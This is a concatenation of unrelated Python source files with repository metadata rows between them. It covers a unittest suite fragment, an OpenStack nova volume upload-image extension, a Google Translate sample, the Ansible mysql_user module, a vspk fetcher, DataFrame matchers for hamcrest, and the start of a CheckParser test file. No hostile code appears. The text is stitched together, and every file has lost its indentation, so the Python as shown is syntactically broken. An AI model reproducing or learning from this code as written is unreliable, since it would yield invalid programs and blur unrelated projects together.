def _tearDownPreviousClass(self, test, result):
previousClass = getattr(result, '_previousTestClass', None)
currentClass = test.__class__
if currentClass == previousClass:
return
if getattr(previousClass, '_classSetupFailed', False):
return
if getattr(result, '_moduleSetUpFailed', False):
return
if getattr(previousClass, "__unittest_skip__", False):
return
tearDownClass = getattr(previousClass, 'tearDownClass', None)
if tearDownClass is not None:
try:
tearDownClass()
except Exception, e:
if isinstance(result, _DebugResult):
raise
className = util.strclass(previousClass)
errorName = 'tearDownClass (%s)' % className
self._addClassOrModuleLevelException(result, e, errorName)
class _ErrorHolder(object):
"""
Placeholder for a TestCase inside a result. As far as a TestResult
is concerned, this looks exactly like a unit test. Used to insert
arbitrary errors into a test suite run.
"""
# Inspired by the ErrorHolder from Twisted:
# http://twistedmatrix.com/trac/browser/trunk/twisted/trial/runner.py
# attribute used by TestResult._exc_info_to_string
failureException = None
def __init__(self, description):
self.description = description
def id(self):
return self.description
def shortDescription(self):
return None
def __repr__(self):
return "<ErrorHolder description=%r>" % (self.description,)
def __str__(self):
return self.id()
def run(self, result):
# could call result.addError(...) - but this test-like object
# shouldn't be run anyway
pass
def __call__(self, result):
return self.run(result)
def countTestCases(self):
return 0
def _isnotsuite(test):
"A crude way to tell apart testcases and suites with duck-typing"
try:
iter(test)
except TypeError:
return True
return False
class _DebugResult(object):
"Used by the TestSuite to hold previous class when running in debug."
_previousTestClass = None
_moduleSetUpFailed = False
shouldStop = False
| bsd-3-clause | 3,871,075,794,207,900,700 | 31.379791 | 80 | 0.568685 | false |
NewpTone/stacklab-nova | nova/api/openstack/volume/contrib/volume_actions.py | 6 | 5150 | # Copyright 2012 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import webob
from xml.dom import minidom
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova.api.openstack import xmlutil
from nova import exception
from nova import flags
from nova.openstack.common import log as logging
from nova.openstack.common.rpc import common as rpc_common
from nova import volume
FLAGS = flags.FLAGS
LOG = logging.getLogger(__name__)
def authorize(context, action_name):
action = 'volume_actions:%s' % action_name
extensions.extension_authorizer('volume', action)(context)
class VolumeToImageSerializer(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('os-volume_upload_image',
selector='os-volume_upload_image')
root.set('id')
root.set('updated_at')
root.set('status')
root.set('display_description')
root.set('size')
root.set('volume_type')
root.set('image_id')
root.set('container_format')
root.set('disk_format')
root.set('image_name')
return xmlutil.MasterTemplate(root, 1)
class VolumeToImageDeserializer(wsgi.XMLDeserializer):
"""Deserializer to handle xml-formatted requests"""
def default(self, string):
dom = minidom.parseString(string)
action_node = dom.childNodes[0]
action_name = action_node.tagName
action_data = {}
attributes = ["force", "image_name", "container_format", "disk_format"]
for attr in attributes:
if action_node.hasAttribute(attr):
action_data[attr] = action_node.getAttribute(attr)
if 'force' in action_data and action_data['force'] == 'True':
action_data['force'] = True
return {'body': {action_name: action_data}}
class VolumeActionsController(wsgi.Controller):
def __init__(self, *args, **kwargs):
super(VolumeActionsController, self).__init__(*args, **kwargs)
self.volume_api = volume.API()
@wsgi.response(202)
@wsgi.action('os-volume_upload_image')
@wsgi.serializers(xml=VolumeToImageSerializer)
@wsgi.deserializers(xml=VolumeToImageDeserializer)
def _volume_upload_image(self, req, id, body):
"""Uploads the specified volume to image service."""
context = req.environ['nova.context']
try:
params = body['os-volume_upload_image']
except (TypeError, KeyError):
msg = _("Invalid request body")
raise webob.exc.HTTPBadRequest(explanation=msg)
if not params.get("image_name"):
msg = _("No image_name was specified in request.")
raise webob.exc.HTTPBadRequest(explanation=msg)
force = params.get('force', False)
try:
volume = self.volume_api.get(context, id)
except exception.VolumeNotFound, error:
raise webob.exc.HTTPNotFound(explanation=unicode(error))
authorize(context, "upload_image")
image_metadata = {"container_format": params.get("container_format",
"bare"),
"disk_format": params.get("disk_format", "raw"),
"name": params["image_name"]}
try:
response = self.volume_api.copy_volume_to_image(context,
volume,
image_metadata,
force)
except exception.InvalidVolume, error:
raise webob.exc.HTTPBadRequest(explanation=unicode(error))
except ValueError, error:
raise webob.exc.HTTPBadRequest(explanation=unicode(error))
except rpc_common.RemoteError as error:
msg = "%(err_type)s: %(err_msg)s" % {'err_type': error.exc_type,
'err_msg': error.value}
raise webob.exc.HTTPBadRequest(explanation=msg)
return {'os-volume_upload_image': response}
class Volume_actions(extensions.ExtensionDescriptor):
"""Enable volume actions
"""
name = "VolumeActions"
alias = "os-volume-actions"
namespace = "http://docs.openstack.org/volume/ext/volume-actions/api/v1.1"
updated = "2012-05-31T00:00:00+00:00"
def get_controller_extensions(self):
controller = VolumeActionsController()
extension = extensions.ControllerExtension(self, 'volumes', controller)
return [extension]
| apache-2.0 | 8,319,964,724,987,609,000 | 38.312977 | 79 | 0.618252 | false |
hashems/Mobile-Cloud-Development-Projects | translate/cloud-client/snippets.py | 4 | 4692 | #!/usr/bin/env python
# Copyright 2016 Google, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This application demonstrates how to perform basic operations with the
Google Cloud Translate API
For more information, the documentation at
https://cloud.google.com/translate/docs.
"""
import argparse
from google.cloud import translate
def detect_language(text):
"""Detects the text's language."""
translate_client = translate.Client()
# Text can also be a sequence of strings, in which case this method
# will return a sequence of results for each text.
result = translate_client.detect_language(text)
print('Text: {}'.format(text))
print('Confidence: {}'.format(result['confidence']))
print('Language: {}'.format(result['language']))
def list_languages():
"""Lists all available languages."""
translate_client = translate.Client()
results = translate_client.get_languages()
for language in results:
print(u'{name} ({language})'.format(**language))
def list_languages_with_target(target):
"""Lists all available languages and localizes them to the target language.
Target must be an ISO 639-1 language code.
See https://g.co/cloud/translate/v2/translate-reference#supported_languages
"""
translate_client = translate.Client()
results = translate_client.get_languages(target_language=target)
for language in results:
print(u'{name} ({language})'.format(**language))
def translate_text_with_model(target, text, model=translate.NMT):
"""Translates text into the target language.
Make sure your project is whitelisted.
Target must be an ISO 639-1 language code.
See https://g.co/cloud/translate/v2/translate-reference#supported_languages
"""
translate_client = translate.Client()
# Text can also be a sequence of strings, in which case this method
# will return a sequence of results for each text.
result = translate_client.translate(
text,
target_language=target,
model=model)
print(u'Text: {}'.format(result['input']))
print(u'Translation: {}'.format(result['translatedText']))
print(u'Detected source language: {}'.format(
result['detectedSourceLanguage']))
def translate_text(target, text):
"""Translates text into the target language.
Target must be an ISO 639-1 language code.
See https://g.co/cloud/translate/v2/translate-reference#supported_languages
"""
translate_client = translate.Client()
# Text can also be a sequence of strings, in which case this method
# will return a sequence of results for each text.
result = translate_client.translate(
text,
target_language=target)
print(u'Text: {}'.format(result['input']))
print(u'Translation: {}'.format(result['translatedText']))
print(u'Detected source language: {}'.format(
result['detectedSourceLanguage']))
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter)
subparsers = parser.add_subparsers(dest='command')
detect_langage_parser = subparsers.add_parser(
'detect-language', help=detect_language.__doc__)
detect_langage_parser.add_argument('text')
list_languages_parser = subparsers.add_parser(
'list-languages', help=list_languages.__doc__)
list_languages_with_target_parser = subparsers.add_parser(
'list-languages-with-target', help=list_languages_with_target.__doc__)
list_languages_with_target_parser.add_argument('target')
translate_text_parser = subparsers.add_parser(
'translate-text', help=translate_text.__doc__)
translate_text_parser.add_argument('target')
translate_text_parser.add_argument('text')
args = parser.parse_args()
if args.command == 'detect-language':
detect_language(args.text)
elif args.command == 'list-languages':
list_languages()
elif args.command == 'list-languages-with-target':
list_languages_with_target(args.target)
elif args.command == 'translate-text':
translate_text(args.target, args.text)
| apache-2.0 | 7,563,367,722,656,731,000 | 32.514286 | 79 | 0.696292 | false |
jjshoe/ansible-modules-core | database/mysql/mysql_user.py | 5 | 22174 | #!/usr/bin/python
# (c) 2012, Mark Theunissen <[email protected]>
# Sponsored by Four Kitchens http://fourkitchens.com.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: mysql_user
short_description: Adds or removes a user from a MySQL database.
description:
- Adds or removes a user from a MySQL database.
version_added: "0.6"
options:
name:
description:
- name of the user (role) to add or remove
required: true
password:
description:
- set the user's password. (Required when adding a user)
required: false
default: null
encrypted:
description:
- Indicate that the 'password' field is a `mysql_native_password` hash
required: false
choices: [ "yes", "no" ]
default: "no"
version_added: "2.0"
host:
description:
- the 'host' part of the MySQL username
required: false
default: localhost
host_all:
description:
- override the host option, making ansible apply changes to
all hostnames for a given user. This option cannot be used
when creating users
required: false
choices: [ "yes", "no" ]
default: "no"
version_added: "2.1"
priv:
description:
- "MySQL privileges string in the format: C(db.table:priv1,priv2)"
required: false
default: null
append_privs:
description:
- Append the privileges defined by priv to the existing ones for this
user instead of overwriting existing ones.
required: false
choices: [ "yes", "no" ]
default: "no"
version_added: "1.4"
state:
description:
- Whether the user should exist. When C(absent), removes
the user.
required: false
default: present
choices: [ "present", "absent" ]
check_implicit_admin:
description:
- Check if mysql allows login as root/nopassword before trying supplied credentials.
required: false
choices: [ "yes", "no" ]
default: "no"
version_added: "1.3"
update_password:
required: false
default: always
choices: ['always', 'on_create']
version_added: "2.0"
description:
- C(always) will update passwords if they differ. C(on_create) will only set the password for newly created users.
notes:
- "MySQL server installs with default login_user of 'root' and no password. To secure this user
as part of an idempotent playbook, you must create at least two tasks: the first must change the root user's password,
without providing any login_user/login_password details. The second must drop a ~/.my.cnf file containing
the new root credentials. Subsequent runs of the playbook will then succeed by reading the new credentials from
the file."
- Currently, there is only support for the `mysql_native_password` encryted password hash module.
author: "Jonathan Mainguy (@Jmainguy)"
extends_documentation_fragment: mysql
'''
EXAMPLES = """
# Removes anonymous user account for localhost
- mysql_user: name='' host=localhost state=absent
# Removes all anonymous user accounts
- mysql_user: name='' host_all=yes state=absent
# Create database user with name 'bob' and password '12345' with all database privileges
- mysql_user: name=bob password=12345 priv=*.*:ALL state=present
# Create database user with name 'bob' and previously hashed mysql native password '*EE0D72C1085C46C5278932678FBE2C6A782821B4' with all database privileges
- mysql_user: name=bob password='*EE0D72C1085C46C5278932678FBE2C6A782821B4' encrypted=yes priv=*.*:ALL state=present
# Creates database user 'bob' and password '12345' with all database privileges and 'WITH GRANT OPTION'
- mysql_user: name=bob password=12345 priv=*.*:ALL,GRANT state=present
# Modify user Bob to require SSL connections. Note that REQUIRESSL is a special privilege that should only apply to *.* by itself.
- mysql_user: name=bob append_privs=true priv=*.*:REQUIRESSL state=present
# Ensure no user named 'sally'@'localhost' exists, also passing in the auth credentials.
- mysql_user: login_user=root login_password=123456 name=sally state=absent
# Ensure no user named 'sally' exists at all
- mysql_user: name=sally host_all=yes state=absent
# Specify grants composed of more than one word
- mysql_user: name=replication password=12345 priv="*.*:REPLICATION CLIENT" state=present
# Revoke all privileges for user 'bob' and password '12345'
- mysql_user: name=bob password=12345 priv=*.*:USAGE state=present
# Example privileges string format
mydb.*:INSERT,UPDATE/anotherdb.*:SELECT/yetanotherdb.*:ALL
# Example using login_unix_socket to connect to server
- mysql_user: name=root password=abc123 login_unix_socket=/var/run/mysqld/mysqld.sock
# Example .my.cnf file for setting the root password
[client]
user=root
password=n<_665{vS43y
"""
import getpass
import tempfile
import re
import string
try:
import MySQLdb
except ImportError:
mysqldb_found = False
else:
mysqldb_found = True
VALID_PRIVS = frozenset(('CREATE', 'DROP', 'GRANT', 'GRANT OPTION',
'LOCK TABLES', 'REFERENCES', 'EVENT', 'ALTER',
'DELETE', 'INDEX', 'INSERT', 'SELECT', 'UPDATE',
'CREATE TEMPORARY TABLES', 'TRIGGER', 'CREATE VIEW',
'SHOW VIEW', 'ALTER ROUTINE', 'CREATE ROUTINE',
'EXECUTE', 'FILE', 'CREATE TABLESPACE', 'CREATE USER',
'PROCESS', 'PROXY', 'RELOAD', 'REPLICATION CLIENT',
'REPLICATION SLAVE', 'SHOW DATABASES', 'SHUTDOWN',
'SUPER', 'ALL', 'ALL PRIVILEGES', 'USAGE', 'REQUIRESSL'))
class InvalidPrivsError(Exception):
pass
# ===========================================
# MySQL module specific support methods.
#
# User Authentication Management was change in MySQL 5.7
# This is a generic check for if the server version is less than version 5.7
def server_version_check(cursor):
cursor.execute("SELECT VERSION()");
result = cursor.fetchone()
version_str = result[0]
version = version_str.split('.')
# Currently we have no facility to handle new-style password update on
# mariadb and the old-style update continues to work
if 'mariadb' in version_str.lower():
return True
if (int(version[0]) <= 5 and int(version[1]) < 7):
return True
else:
return False
def get_mode(cursor):
cursor.execute('SELECT @@GLOBAL.sql_mode')
result = cursor.fetchone()
mode_str = result[0]
if 'ANSI' in mode_str:
mode = 'ANSI'
else:
mode = 'NOTANSI'
return mode
def user_exists(cursor, user, host, host_all):
if host_all:
cursor.execute("SELECT count(*) FROM user WHERE user = %s", user)
else:
cursor.execute("SELECT count(*) FROM user WHERE user = %s AND host = %s", (user,host))
count = cursor.fetchone()
return count[0] > 0
def user_add(cursor, user, host, host_all, password, encrypted, new_priv, check_mode):
# we cannot create users without a proper hostname
if host_all:
return False
if check_mode:
return True
if password and encrypted:
cursor.execute("CREATE USER %s@%s IDENTIFIED BY PASSWORD %s", (user,host,password))
elif password and not encrypted:
cursor.execute("CREATE USER %s@%s IDENTIFIED BY %s", (user,host,password))
if new_priv is not None:
for db_table, priv in new_priv.iteritems():
privileges_grant(cursor, user,host,db_table,priv)
return True
def is_hash(password):
ishash = False
if len(password) == 41 and password[0] == '*':
if frozenset(password[1:]).issubset(string.hexdigits):
ishash = True
return ishash
def user_mod(cursor, user, host, host_all, password, encrypted, new_priv, append_privs, check_mode):
changed = False
grant_option = False
if host_all:
hostnames = user_get_hostnames(cursor, user)
else:
hostnames = [host]
for host in hostnames:
# Handle clear text and hashed passwords.
if bool(password):
# Determine what user management method server uses
old_user_mgmt = server_version_check(cursor)
if old_user_mgmt:
cursor.execute("SELECT password FROM user WHERE user = %s AND host = %s", (user,host))
else:
cursor.execute("SELECT authentication_string FROM user WHERE user = %s AND host = %s", (user,host))
current_pass_hash = cursor.fetchone()
if encrypted:
encrypted_string = (password)
if is_hash(password):
if current_pass_hash[0] != encrypted_string:
if check_mode:
return True
if old_user_mgmt:
cursor.execute("SET PASSWORD FOR %s@%s = %s", (user, host, password))
else:
cursor.execute("ALTER USER %s@%s IDENTIFIED WITH mysql_native_password AS %s", (user, host, password))
changed = True
else:
module.fail_json(msg="encrypted was specified however it does not appear to be a valid hash expecting: *SHA1(SHA1(your_password))")
else:
if old_user_mgmt:
cursor.execute("SELECT PASSWORD(%s)", (password,))
else:
cursor.execute("SELECT CONCAT('*', UCASE(SHA1(UNHEX(SHA1(%s)))))", (password,))
new_pass_hash = cursor.fetchone()
if current_pass_hash[0] != new_pass_hash[0]:
if check_mode:
return True
if old_user_mgmt:
cursor.execute("SET PASSWORD FOR %s@%s = PASSWORD(%s)", (user, host, password))
else:
cursor.execute("ALTER USER %s@%s IDENTIFIED BY %s", (user, host, password))
changed = True
# Handle privileges
if new_priv is not None:
curr_priv = privileges_get(cursor, user,host)
# If the user has privileges on a db.table that doesn't appear at all in
# the new specification, then revoke all privileges on it.
for db_table, priv in curr_priv.iteritems():
# If the user has the GRANT OPTION on a db.table, revoke it first.
if "GRANT" in priv:
grant_option = True
if db_table not in new_priv:
if user != "root" and "PROXY" not in priv and not append_privs:
if check_mode:
return True
privileges_revoke(cursor, user,host,db_table,priv,grant_option)
changed = True
# If the user doesn't currently have any privileges on a db.table, then
# we can perform a straight grant operation.
for db_table, priv in new_priv.iteritems():
if db_table not in curr_priv:
if check_mode:
return True
privileges_grant(cursor, user,host,db_table,priv)
changed = True
# If the db.table specification exists in both the user's current privileges
# and in the new privileges, then we need to see if there's a difference.
db_table_intersect = set(new_priv.keys()) & set(curr_priv.keys())
for db_table in db_table_intersect:
priv_diff = set(new_priv[db_table]) ^ set(curr_priv[db_table])
if (len(priv_diff) > 0):
if check_mode:
return True
if not append_privs:
privileges_revoke(cursor, user,host,db_table,curr_priv[db_table],grant_option)
privileges_grant(cursor, user,host,db_table,new_priv[db_table])
changed = True
return changed
def user_delete(cursor, user, host, host_all, check_mode):
if check_mode:
return True
if host_all:
hostnames = user_get_hostnames(cursor, user)
for hostname in hostnames:
cursor.execute("DROP USER %s@%s", (user, hostname))
else:
cursor.execute("DROP USER %s@%s", (user, host))
return True
def user_get_hostnames(cursor, user):
cursor.execute("SELECT Host FROM mysql.user WHERE user = %s", user)
hostnames_raw = cursor.fetchall()
hostnames = []
for hostname_raw in hostnames_raw:
hostnames.append(hostname_raw[0])
return hostnames
def privileges_get(cursor, user,host):
""" MySQL doesn't have a better method of getting privileges aside from the
SHOW GRANTS query syntax, which requires us to then parse the returned string.
Here's an example of the string that is returned from MySQL:
GRANT USAGE ON *.* TO 'user'@'localhost' IDENTIFIED BY 'pass';
This function makes the query and returns a dictionary containing the results.
The dictionary format is the same as that returned by privileges_unpack() below.
"""
output = {}
cursor.execute("SHOW GRANTS FOR %s@%s", (user, host))
grants = cursor.fetchall()
def pick(x):
if x == 'ALL PRIVILEGES':
return 'ALL'
else:
return x
for grant in grants:
res = re.match("GRANT (.+) ON (.+) TO '.*'@'.+'( IDENTIFIED BY PASSWORD '.+')? ?(.*)", grant[0])
if res is None:
raise InvalidPrivsError('unable to parse the MySQL grant string: %s' % grant[0])
privileges = res.group(1).split(", ")
privileges = [ pick(x) for x in privileges]
if "WITH GRANT OPTION" in res.group(4):
privileges.append('GRANT')
if "REQUIRE SSL" in res.group(4):
privileges.append('REQUIRESSL')
db = res.group(2)
output[db] = privileges
return output
def privileges_unpack(priv, mode):
""" Take a privileges string, typically passed as a parameter, and unserialize
it into a dictionary, the same format as privileges_get() above. We have this
custom format to avoid using YAML/JSON strings inside YAML playbooks. Example
of a privileges string:
mydb.*:INSERT,UPDATE/anotherdb.*:SELECT/yetanother.*:ALL
The privilege USAGE stands for no privileges, so we add that in on *.* if it's
not specified in the string, as MySQL will always provide this by default.
"""
if mode == 'ANSI':
quote = '"'
else:
quote = '`'
output = {}
privs = []
for item in priv.strip().split('/'):
pieces = item.strip().split(':')
dbpriv = pieces[0].rsplit(".", 1)
# Do not escape if privilege is for database '*' (all databases)
if dbpriv[0].strip('`') != '*':
pieces[0] = '%s%s%s.%s' % (quote, dbpriv[0].strip('`'), quote, dbpriv[1])
if '(' in pieces[1]:
output[pieces[0]] = re.split(r',\s*(?=[^)]*(?:\(|$))', pieces[1].upper())
for i in output[pieces[0]]:
privs.append(re.sub(r'\(.*\)','',i))
else:
output[pieces[0]] = pieces[1].upper().split(',')
privs = output[pieces[0]]
new_privs = frozenset(privs)
if not new_privs.issubset(VALID_PRIVS):
raise InvalidPrivsError('Invalid privileges specified: %s' % new_privs.difference(VALID_PRIVS))
if '*.*' not in output:
output['*.*'] = ['USAGE']
# if we are only specifying something like REQUIRESSL and/or GRANT (=WITH GRANT OPTION) in *.*
# we still need to add USAGE as a privilege to avoid syntax errors
if 'REQUIRESSL' in priv and not set(output['*.*']).difference(set(['GRANT', 'REQUIRESSL'])):
output['*.*'].append('USAGE')
return output
def privileges_revoke(cursor, user,host,db_table,priv,grant_option):
# Escape '%' since mysql db.execute() uses a format string
db_table = db_table.replace('%', '%%')
if grant_option:
query = ["REVOKE GRANT OPTION ON %s" % db_table]
query.append("FROM %s@%s")
query = ' '.join(query)
cursor.execute(query, (user, host))
priv_string = ",".join([p for p in priv if p not in ('GRANT', 'REQUIRESSL')])
query = ["REVOKE %s ON %s" % (priv_string, db_table)]
query.append("FROM %s@%s")
query = ' '.join(query)
cursor.execute(query, (user, host))
def privileges_grant(cursor, user,host,db_table,priv):
# Escape '%' since mysql db.execute uses a format string and the
# specification of db and table often use a % (SQL wildcard)
db_table = db_table.replace('%', '%%')
priv_string = ",".join([p for p in priv if p not in ('GRANT', 'REQUIRESSL')])
query = ["GRANT %s ON %s" % (priv_string, db_table)]
query.append("TO %s@%s")
if 'REQUIRESSL' in priv:
query.append("REQUIRE SSL")
if 'GRANT' in priv:
query.append("WITH GRANT OPTION")
query = ' '.join(query)
cursor.execute(query, (user, host))
# ===========================================
# Module execution.
#
def main():
module = AnsibleModule(
argument_spec = dict(
login_user=dict(default=None),
login_password=dict(default=None),
login_host=dict(default="localhost"),
login_port=dict(default=3306, type='int'),
login_unix_socket=dict(default=None),
user=dict(required=True, aliases=['name']),
password=dict(default=None, no_log=True, type='str'),
encrypted=dict(default=False, type='bool'),
host=dict(default="localhost"),
host_all=dict(type="bool", default="no"),
state=dict(default="present", choices=["absent", "present"]),
priv=dict(default=None),
append_privs=dict(default=False, type='bool'),
check_implicit_admin=dict(default=False, type='bool'),
update_password=dict(default="always", choices=["always", "on_create"]),
config_file=dict(default="~/.my.cnf"),
ssl_cert=dict(default=None),
ssl_key=dict(default=None),
ssl_ca=dict(default=None),
),
supports_check_mode=True
)
login_user = module.params["login_user"]
login_password = module.params["login_password"]
user = module.params["user"]
password = module.params["password"]
encrypted = module.boolean(module.params["encrypted"])
host = module.params["host"].lower()
host_all = module.params["host_all"]
state = module.params["state"]
priv = module.params["priv"]
check_implicit_admin = module.params['check_implicit_admin']
config_file = module.params['config_file']
append_privs = module.boolean(module.params["append_privs"])
update_password = module.params['update_password']
ssl_cert = module.params["ssl_cert"]
ssl_key = module.params["ssl_key"]
ssl_ca = module.params["ssl_ca"]
db = 'mysql'
config_file = os.path.expanduser(os.path.expandvars(config_file))
if not mysqldb_found:
module.fail_json(msg="the python mysqldb module is required")
cursor = None
try:
if check_implicit_admin:
try:
cursor = mysql_connect(module, 'root', '', config_file, ssl_cert, ssl_key, ssl_ca, db)
except:
pass
if not cursor:
cursor = mysql_connect(module, login_user, login_password, config_file, ssl_cert, ssl_key, ssl_ca, db)
except Exception, e:
module.fail_json(msg="unable to connect to database, check login_user and login_password are correct or %s has the credentials. Exception message: %s" % (config_file, e))
if priv is not None:
try:
mode = get_mode(cursor)
except Exception, e:
module.fail_json(msg=str(e))
try:
priv = privileges_unpack(priv, mode)
except Exception, e:
module.fail_json(msg="invalid privileges string: %s" % str(e))
if state == "present":
if user_exists(cursor, user, host, host_all):
try:
if update_password == 'always':
changed = user_mod(cursor, user, host, host_all, password, encrypted, priv, append_privs, module.check_mode)
else:
changed = user_mod(cursor, user, host, host_all, None, encrypted, priv, append_privs, module.check_mode)
except (SQLParseError, InvalidPrivsError, MySQLdb.Error), e:
module.fail_json(msg=str(e))
else:
if password is None:
module.fail_json(msg="password parameter required when adding a user")
if host_all:
module.fail_json(msg="host_all parameter cannot be used when adding a user")
try:
changed = user_add(cursor, user, host, host_all, password, encrypted, priv, module.check_mode)
except (SQLParseError, InvalidPrivsError, MySQLdb.Error), e:
module.fail_json(msg=str(e))
elif state == "absent":
if user_exists(cursor, user, host, host_all):
changed = user_delete(cursor, user, host, host_all, module.check_mode)
else:
changed = False
module.exit_json(changed=changed, user=user)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.database import *
from ansible.module_utils.mysql import *
if __name__ == '__main__':
main()
| gpl-3.0 | 8,417,220,587,364,133,000 | 38.315603 | 178 | 0.611437 | false |
nuagenetworks/vspk-python | vspk/v5_0/fetchers/nuinfrastructureevdfprofiles_fetcher.py | 2 | 2226 | # -*- coding: utf-8 -*-
#
# Copyright (c) 2015, Alcatel-Lucent Inc, 2017 Nokia
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from bambou import NURESTFetcher
class NUInfrastructureEVDFProfilesFetcher(NURESTFetcher):
""" Represents a NUInfrastructureEVDFProfiles fetcher
Notes:
This fetcher enables to fetch NUInfrastructureEVDFProfile objects.
See:
bambou.NURESTFetcher
"""
@classmethod
def managed_class(cls):
""" Return NUInfrastructureEVDFProfile class that is managed.
Returns:
.NUInfrastructureEVDFProfile: the managed class
"""
from .. import NUInfrastructureEVDFProfile
return NUInfrastructureEVDFProfile
| bsd-3-clause | 1,874,936,843,171,087,600 | 41.018868 | 86 | 0.739443 | false |
Pyangs/ShiPanE-Python-SDK | tests/shipane_sdk/matchers/dataframe_matchers.py | 1 | 1232 | # -*- coding: utf-8 -*-
import re
from hamcrest.core.base_matcher import BaseMatcher
class HasColumn(BaseMatcher):
def __init__(self, column):
self._column = column
def _matches(self, df):
return self._column in df.columns
def describe_to(self, description):
description.append_text(u'Dataframe doesn\'t have colum [{0}]'.format(self._column))
def has_column(column):
return HasColumn(column)
class HasColumnMatches(BaseMatcher):
def __init__(self, column_pattern):
self._column_pattern = re.compile(column_pattern)
def _matches(self, df):
return df.filter(regex=self._column_pattern).columns.size > 0
def describe_to(self, description):
description.append_text(u'Dataframe doesn\'t have colum matches [{0}]'.format(self._column_pattern))
def has_column_matches(column_pattern):
return HasColumnMatches(column_pattern)
class HasRow(BaseMatcher):
def __init__(self, row):
self._row = row
def _matches(self, df):
return self._row in df.index
def describe_to(self, description):
description.append_text(u'Dataframe doesn\'t have row [%s]'.format(self._row))
def has_row(row):
return HasRow(row)
| mit | 5,263,478,676,103,618,000 | 23.64 | 108 | 0.666396 | false |
ner0x652/CheckGuard | tests/CheckTests.py | 2 | 5706 |
import CheckParser
import re
import unittest
import itertools
class ParserIniPosTest(unittest.TestCase):
def setUp(self):
self.testObj = CheckParser.CheckParser(0)
print("ParserIniPos SetUp executed")
def tearDown(self):
self.testObj = None
print("ParserIniPos TearDown executed")
def test_ini_pos(self):
self.assertEqual(self.testObj.position, 0, "Initial position is not 0")
def test_changed_pos(self):
self.testObj.position = 1
self.assertEqual(self.testObj.position, 1, "Initial position didn't change")
def test_negative_pos(self):
self.assertRaises(ValueError, CheckParser.CheckParser, -1)
class FileWriteReadTest(unittest.TestCase):
def setUp(self):
self.filename = r"C:\Users\nero_luci\Desktop\GitHub\CheckGuard\tests\pos.txt"
print("FileWriteRead SetUp executed")
def tearDown(self):
print("FileWriteRead TearDown executed")
def test_write_2_file(self):
value_2_file = "0"
CheckParser.write_init_pos(value_2_file)
with open(self.filename, "r") as tf:
expected = tf.read()
self.assertEqual(expected, value_2_file, "File writing failed")
def test_read_from_file(self):
expected = 0
read_value = CheckParser.read_init_pos()
self.assertEqual(expected, read_value, "File reading failed")
class RegexTest(unittest.TestCase):
def setUp(self):
self.test_list_1 = ["2 x #2 mere pere @ 0,01 0% 0,01",
"1 x #33 hubba bubba @ 12,50 9% 0,01",
"7 x #103 Cappuccino @ 7,00 24% 7,00",
"5 x #2400 Dorna Apa @ 555,70 24% 5,70",
"3 x #307 Frappe @ 7,50 9% 7,50",
"25 x #101 Cafea @ 5,50 24% 11,00",
"2 x #2101 Bere @ 6,70 24% 13,40",
"66 x #2327 Lemonade @ 6,00 0% 6,00",
"8 x #2310 Fresh @ 8,80 16% 8,80",
"999 x #2332 Whisky&Cola @ 9,90 11% 19,80"
]
self.test_line_3 = "cnaldknpinda % @ xx \/'*&"
self.prices = ['0,01', '12,50', '7,00', '555,70', '7,50', '5,50', '6,70', '6,00', '8,80', '9,90']
self.qtys = ['2', '1', '7', '5', '3', '25', '2', '66', '8', '999']
self.tvas = ['0%', '9%', '24%', '24%', '9%', '24%', '24%', '0%', '16%', '11%']
self.names = ['mere pere', 'hubba bubba', 'Cappuccino', 'Dorna Apa', 'Frappe', 'Cafea', 'Bere',
'Lemonade', 'Fresh', 'Whisky&Cola']
def tearDown(self):
pass
